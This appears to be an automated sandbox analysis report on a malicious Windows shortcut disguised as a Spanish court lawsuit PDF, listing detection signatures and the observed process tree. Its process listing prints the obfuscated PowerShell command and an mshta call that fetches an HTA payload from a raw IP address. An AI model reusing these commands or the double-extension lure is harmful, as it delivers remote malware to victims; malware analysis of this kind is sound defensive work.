Edit tour
Windows
Analysis Report
DEMANDA JUICIO JUZGADO01.pdf.lnk
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
Obfuscated command line found
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- powershell.exe (PID: 7292 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Execution Policy UnR estricted $E='T:17S2 zMhsAlcpo6 5y9tar4/.' ; &(-join( $E[(472-46 8),(979-96 9),(299-28 8)])) ^= ( -join($E[( 472-468),( 979-969),( 299-288)]) ); ^= *% ( -join($E[( 757-750),( 472-468),( 769-761),( -904+904), (979-969)] )); foreac h($S in @( (727-719), (-217+236) ,(-171+190 ),(387-374 ),(-940+94 1),(-632+6 55),(-622+ 645),(-144 +162),(771 -749),(-48 2+506),(-4 57+459),(6 91-675),(- 573+595),( 518-494),( -755+757), (-277+280) ,(262-257) ,(-797+821 ),(-706+70 8),(-556+5 71),(-847+ 862),(-704 +727),(628 -615),(308 -296),(-21 7+223),(-3 38+357),(5 84-561),(7 63-742),(2 97-283),(- 211+228),( 677-660),( 470-453),( -88+108),( -503+512), (-258+282) ,(194-186) ,(856-837) ,(-659+679 ))){$i+=$E [$S]}; *% $i; MD5: 04029E121A0CFA5991749937DD22A1D9) - conhost.exe (PID: 7300 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 7516 cmdline:
"C:\Window s\system32 \mshta.exe " http://9 4.154.172. 166/pczt/r oyyyas.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- svchost.exe (PID: 7836 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
- cleanup
⊘No configs have been found
⊘No yara matches
System Summary |
---|
Source: | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): |